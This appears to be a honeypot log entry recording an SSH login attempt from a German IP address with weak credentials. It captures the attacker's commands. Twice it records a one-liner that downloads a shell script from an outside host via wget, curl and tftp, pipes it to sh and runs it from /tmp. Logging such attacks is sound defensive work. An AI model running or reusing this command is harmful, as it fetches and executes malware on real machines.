Attack 162ac60e-685b-4770-8318-d4d4678f48d9
Details
| ID |
162ac60e-685b-4770-8318-d4d4678f48d9 |
| Attack Type |
ssh |
| IP Address |
176.65.151.51 |
| Username |
elk_user |
| Password |
forensics |
| Client Version |
|
| Country |
Germany |
| Date |
2025-07-03 04:20AM |
Commands
cd /tmp; wget http://5.255.121.213/gay.sh -O- |sh;curl -o http://5.255.121.213/gay.sh -O-|sh; tftp -r gay.sh -g 5.255.121.213; chmod 777 gay.sh; sh gay.sh;\n
cd /tmp; wget http://5.255.121.213/gay.sh -O- |sh;curl -o http://5.255.121.213/gay.sh -O-|sh; tftp -r gay.sh -g 5.255.121.213; chmod 777 gay.sh; sh gay.sh;\n
Proxy Requests
|
IP Address |
User / Pass |
Date |
Headers |
URL |